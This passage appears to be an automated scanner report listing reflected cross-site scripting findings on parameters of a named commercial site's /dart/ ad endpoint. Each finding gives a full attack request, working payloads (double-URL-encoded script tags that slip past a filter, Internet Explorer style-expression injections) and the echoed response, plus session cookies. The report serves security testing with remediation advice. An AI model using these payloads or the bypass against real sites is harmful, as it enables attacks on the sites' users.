Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 888
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:34 GMT
Connection: close
Content-Length: 888


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx9cd27';570d9e9b527;sz=350x300;ord=1296748882748?" type="text/javascript">
...[SNIP]...

1.459. http://www.local.com/dart/ [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the l request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe54b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e710dcff3a6b was submitted in the l parameter. This input was echoed as fe54b"><script>alert(1)</script>710dcff3a6b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the l request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /dart/?ag=True&p=locm.pp&sz=350x300&ord=1296748882748&k=banks&l=Dallas%2c+TXfe54b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e710dcff3a6b HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 981
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:34 GMT
Connection: close
Content-Length: 981


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_txfe54b"><script>alert(1)</script>710dcff3a6b;sz=350x300;ord=1296748882748?" target="_blank">
...[SNIP]...

1.460. http://www.local.com/dart/ [ord parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the ord request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80630'%3bc205c1fb2ef was submitted in the ord parameter. This input was echoed as 80630';c205c1fb2ef in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dart/?ag=True&p=locm.pp&sz=350x300&ord=129674888274880630'%3bc205c1fb2ef&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 888
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:28 GMT
Connection: close
Content-Length: 888


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300;ord=129674888274880630';c205c1fb2ef?" type="text/javascript">
...[SNIP]...

1.461. http://www.local.com/dart/ [ord parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the ord request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5d33"style%3d"x%3aexpression(alert(1))"2ea0dbdbd7e was submitted in the ord parameter. This input was echoed as e5d33"style="x:expression(alert(1))"2ea0dbdbd7e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /dart/?ag=True&p=locm.pp&sz=350x300&ord=1296748882748e5d33"style%3d"x%3aexpression(alert(1))"2ea0dbdbd7e&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 975
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:28 GMT
Connection: close
Content-Length: 975


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300;ord=1296748882748e5d33"style="x:expression(alert(1))"2ea0dbdbd7e?" target="_blank">
...[SNIP]...

1.462. http://www.local.com/dart/ [p parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 142ef'%3b04d7f2c0dea was submitted in the p parameter. This input was echoed as 142ef';04d7f2c0dea in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dart/?ag=True&p=locm.pp142ef'%3b04d7f2c0dea&sz=350x300&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 888
Date: Thu, 03 Feb 2011 16:02:24 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 888


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.pp142ef';04d7f2c0dea;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300;ord=1296748882748?" type="text/javascript">
...[SNIP]...

1.463. http://www.local.com/dart/ [p parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the p request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4a96"style%3d"x%3aexpression(alert(1))"957bd801f83 was submitted in the p parameter. This input was echoed as f4a96"style="x:expression(alert(1))"957bd801f83 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /dart/?ag=True&p=locm.ppf4a96"style%3d"x%3aexpression(alert(1))"957bd801f83&sz=350x300&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 975
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:24 GMT
Connection: close
Content-Length: 975


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.ppf4a96"style="x:expression(alert(1))"957bd801f83;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300;ord=1296748882748?" target="_blank">
...[SNIP]...

1.464. http://www.local.com/dart/ [pos parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the pos request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a068"style%3d"x%3aexpression(alert(1))"c701155616e was submitted in the pos parameter. This input was echoed as 6a068"style="x:expression(alert(1))"c701155616e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /dart/?ag=True&p=locm.pp&pos=86a068"style%3d"x%3aexpression(alert(1))"c701155616e&t=8&sz=310x101&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 981
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:33 GMT
Connection: close
Content-Length: 981


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=86a068"style="x:expression(alert(1))"c701155616e;tile=8;city=dallas_tx;sz=310x101;ord=1296748882748?" target="_blank">
...[SNIP]...

1.465. http://www.local.com/dart/ [pos parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 795a7'%3b1996a89d919 was submitted in the pos parameter. This input was echoed as 795a7';1996a89d919 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dart/?ag=True&p=locm.pp&pos=8795a7'%3b1996a89d919&t=8&sz=310x101&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 894
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:33 GMT
Connection: close
Content-Length: 894


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.pp;dcopt=ist;kw=banks;pos=8795a7';1996a89d919;tile=8;city=dallas_tx;sz=310x101;ord=1296748882748?" type="text/javascript">
...[SNIP]...

1.466. http://www.local.com/dart/ [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the sz request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d243c"style%3d"x%3aexpression(alert(1))"d187ae2a24b was submitted in the sz parameter. This input was echoed as d243c"style="x:expression(alert(1))"d187ae2a24b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /dart/?ag=True&p=locm.pp&sz=350x300d243c"style%3d"x%3aexpression(alert(1))"d187ae2a24b&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
